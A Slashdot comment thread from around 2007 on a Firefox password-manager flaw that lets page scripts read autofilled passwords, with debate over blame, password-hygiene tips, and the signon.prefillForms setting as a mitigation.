But this article is about stealing passwords remotely. That's another story. Even without a Master Password, the fact that it's open source doesn't effect how easily someone can steal it (ignoring the code quality and ease of bug-fixing in open source, since you're solely talking about the code being open). The website is only allowed to talk to the browser through the usual means. If it finds some other way to talk to the browser or the implementation of the usual means allows more access than desired, then we have a problem, like here.

As an analogy, say I have a bolted door, and you're trying to open it. Everyone knows how the door works; there's a bolt that gets in the way and stuff. If you're inside the house, then you can open it easily. However, if I only allow you to talk to the door from the outside, you can't open it because you can't unbolt the thing. (Ignoring chainsaws, explosives, and other nifty destructive things.)

Site's fault.

[Aleksej]

Please, isn't it the site's vulnerability and not Firefox'es, eh?!!
If a site owner tells me it's my browser's fault that their users can change their site's behaviour, and s/he are not going to do anything about it, I'll leave the damn site.

Re:Site's fault.

[Random+BedHead+Ed]

I'm not entirely sure it is the site's responsibility. Or rather, who you choose to blame depends a great deal on how much you value your passwords. This warning inherent in this vulnerability isn't really intended for webmasters, but rather for browser users. And even if as a browser user you think you're safe, keep in mind that sites get hacked. Even if you trust a site, anyone who hacks it can start harvesting login credentials. Scary.

Re:Site's fault.

[Aleksej]

Agreed. Though, if the site gets hacked with that intent, nothing really matters as long as the user decides to enter the password...

Re:Site's fault.

[Aleksej]

I mean, nothing but NoScript matters, if the password is going to be transferred using JS. And then the problem is not unlike the one with remote images blocking: you'd like to allow it by the source, not only by the target. Well, at least I would.

You can always do this kind of stuff with cookies.

[scienceguy55]

In most cases a vulnerability like this will not significantly increase your risk of exploitation as most web sites store passwords in cookies anyway, which are supposed to be readable by javascript from the originating site. If I can run a script on a myspace profile that you visit I can get your password from the cookie that myspcace stores on your machine.

Safari

[ens0niq]

Safari also vulnerable...

Re:Safari

[pherthyl]

Interestingly enough, Konqueror/KHTML (on which Safari is based) is not vulnerable (just tried the demo). It does password saving as well, but apparently have found a way to avoid the problem.

Re:Stealing passwords? Hardly...

[AndersOSU]

Not only that, but when they use the free passwords, it's not identity theft, it's identity infringement.

Re:You can always do this kind of stuff with cooki

[adnonsense]

Err, I don't know about myspace, but any half-decently programmed website (hopefully the majority) won't be storing anything in your cookies other than trivial configurations preferences and a session key. Certainly not your password. While it's possible to hijack the session by reading the session key (and there are ways of preventing that on the server side too), that won't get you the user's password. Unless the site in question is incredibly badly programmed, in which cae you're probably lost anyway.

Trust

[BlueParrot]

a) If it is your machine you could just as well use a PGP encrypoted text file. If the website in question is still vulnerable, then it is a problem with the website, and changing browser won't help you.

b) If it is not your machine, or if you think your machine is compromised, then you really shouldn't be typing your passwords in it to begin with.

Seriously, find a strong passphrase and store the damn password list as a PGP encyrpted file on a USB pen drive. Only decrypt it on machines you trust. If you still lose your password then you either typed it into a compromised machine ( meaning you're fucked anyway ), you were victim to a man in the middle attack ( meaning you're fucked anyway ) or there was a vulnerability on the server side ( meaning you're fucked anyway ).

Personally I don't trust a whole lot of websites to secure their own systems so I don't use my root or e-mail password for my facebook account...

Password = Password

[BrentRJones]

keeps it much easier for all my sites, except my bank for which I use Pa$$word. I trust you guys here not to spread this around.

Re:Password = Password

[WK2]

Thanks a lot, jerk. Your bank account was already empty.

the great law of computer security

[wikinerd]

The Great Law of Computer Security: Networked computers are insecure by nature. Everything that is stored within a networked computer can and will be compromised. Corollary: Always use a non-networked computer to store critical data, or better yet, no computer at all; a piece of paper inside your wallet is probably safer at most situations. Shortened version: Distrust all computers.

Not the only issue

[the_womble]

I have found all versions of FF from 1.0 to 2.0.0.4 tend to sometimes store a password unasked, and then automatically fill in the password (but not the username) on my next visit to the site.

I have never heard of anyone else having this problem, and I cannot reliably reproduce it, but it does happen occasionally.

Not required.

Not required. FireFox, like most Open SOurce software has no security flaws. NEXT!

never need to remember unique passwords per site

[speculatrix]

I am shamed to admit but I used to use the same password on many sites, only using unique passwords for those I regarded as important. It was only when at one job the employer terminated the employment of many staff (financial problems) and we were forced to leave the building without returning to our desks that I realised that saving passwords on a work computer was not a good thing (my then former colleagues would have had access to my password saves in firefox and thus access to my default pass).

Since then I've been using supergenpass which allows you to have a unique password for each web site generated using a master password and a hash of the domain.

I no longer save passwords in firefox, and the passwords used on websites are nicely random too. Moreover, I only need to remember my master password and so can use any computer.

Stupid Design

[Slashdot+Parent]

Is there some reason that Firefox thought it was a good idea to automatically populate passwords for the user?

It just seems to me like better design to require some sort of user interaction before coughing up a password.

Master Password

[Bellum+Aeternus]

Since disabling JavaScript really isn't an option these days, I guess my question is: Do using a Master Password (like I do) really protect you and will somebody from Mozilla comment, please. Seriously, since the advent of an integrated Master Password I've been letting my web browser remember passwords for me, but really put a dent in my confidence.

Re:Master Password

disabling JavaScript IS really an option these days. use NoScript, whitelist the few sites you are using daily and really need JavaScript, and to hell with the others.

heck, if you already use Adblock and tools like Permit Cookies, why not ?

so.. uh...

why broadcast to the entire world that there is a problem, so that those with the know how, can find out about it and start hacking....

now. Firefox has to work twice as hard to cover it up, because more people are going to try and use it before they fix it....

Hardly.

Information (including passwords) wants to be free!

Passwords may be data, but they are not information.

config:about

[Ummon]

set signon.prefillForms to false

Re:config:about

[colfer]

Parent is exactly right. This is old news, but Firefox still ships with the insecure default setting.
http://kb.mozillazine.org/Signon.prefillForms
To change it to "false", type "about:config" in the address bar, hit enter, and put "prefill" or whatever in the filter to search to it:
signon.prefillForms

Dupe? What else!

[haraldm]

Ohmygod. Dupes belong to the culture of Slashdot, they are the cherry on the cake for all the people who don't get a message at the first time, or who make a living pointing out dupes on /.

For what it's worth, messages with a subject ~ "*[Dd]upe*\!" are the most common dupes, and should be avoided at all cost.

We should stop pointing out dupes and start slashing non-dupes. That would reduce the traffic by at least 24.3% and would allow /. to postpone the next harddisk purchase by a month or two, or one could purchase 750GB instead of 1TB disks.

How to solve this

[Random832]

How to solve: Do the opposite of what's done with input type=file
With input type=file, the script cannot write the value, and changing it to this from another type clears the value. With input type=password, have it so that changing it _from_ password _to_ another type clears the value, and so that the script cannot _read_ the value.

As long...

[amccaf1]

As long as no one figures out an exploit wherein the hacker can turn on my webcam and point it at the yellow sticky notes stuck to the side of my monitor, they'll never get my passwords.

Learn more about this exploit

[giminy]

This exploit involves users visiting a malicious website. To learn more about this exploit, click here.

Like I'm dumb enough

[Master+of+Transhuman]

to allow any APPLICATION to remember my passwords...

That's what my brain is for. And for those of you without brains - and you know who you are - there are encrypted password managers for that.

Re:Stealing passwords? Hardly...

[Jherek+Carnelian]

This isn't theft, it's liberation! Information (including passwords) wants to be free! Presumably you are trying to make a didactic point discrediting the slashdot hive mind's belief that 'piracy' is the natural order of things.

But all you've really done is to re-enforce that belief, not discredit it. The whole foundation of the "information wants to be free" meme is that in making something public, you relinquish all control over it. In this case, Firefox's password manager has a flaw that causes it to make passwords public, thus causing the 'owner' to relinquish all control over them.

So, just as the standard advice to publishers afraid of piracy is, "don't publish it if you don't want it pirated" the same thing goes in this case, "don't use the buggy password manager if you don't want your passwords published."

Re:Stealing passwords? Hardly...

[jgoemat]

This isn't theft, it's liberation! Information (including passwords) wants to be free!

I assume you are making a dig at the anti-copyright crowd. The distinction you fail to see is that copyrighted works are published, letting recipients know exactly what is in them. It is merely the monopoly on copying and creation of derivative works that is protected by law in order to give the public an incentive to create new works. Passwords are opposite in that they are kept secret for a good reason. Also they probably cannot be given a copyright monopoly since there is not a modicum of expression in most passwords.

OpenID

[Poromenos1]

God, I wish everyone would just switched over to OpenID and be done with it. One password for everything? Sign me up! (Well, I already have). Now I'm just waiting/hoping it'll gain critical mass and start being implemented into every site.

Oh really?

[jgoemat]

How are you safe?

1. Open browser
2. Click on MySpace bookmark
3. Enter master password to login to myspace
4. Visit joebob's page, which has javascript to steal your password
5. pwn3d

If you're on the site with the vulnerability, you probably already entered your master password to login, and you only have to do that once per session to use all of your passwords.

Sorry to come in late but there catch to this

[Allnighterking]

IF you password protect your master password list then when you go to the "evil page" it will pop up a window asking for your master password. Furthermore to protect yourself even more you can install this plugin Master Password Timeout and set your password to time out after a very short period of time. This way every page you go to during your session that has a login you will have to enter you master password again anew.

Is this a fix. No. Does this work on all OS's yes.

Online Security made simple

[donak]

Back in the day when I got my first sparkling new Windows PC, it had this great feature called an address book, built in and waiting eagerly to save all the email addresses of the friends I sent email to. At the same time I got that Windows PC onto the internet by the new modern 32kb/sec dialup connection I had, I was hearing/reading about how viruses could be used to "read" the contents of my address book for infecting/spamming purposes.

So I never used it.

I apply the same principle to web browsers of all flavours which offer to "save" my passwords. Not hard is it?
If you really, seriously can't remember UID/Passwords for websites, keep a small notebook handy (and safe).

Re:Online Security made simple

[timrichardson]

This is a very late post, but changing this setting will help:
http://kb.mozillazine.org/Signon.prefillForms

IN firefox, enter
about:config
type prefill to seach on this term, and double click the entry above to go to false.

You will then have to double click on a field before password manager provides any input to the page.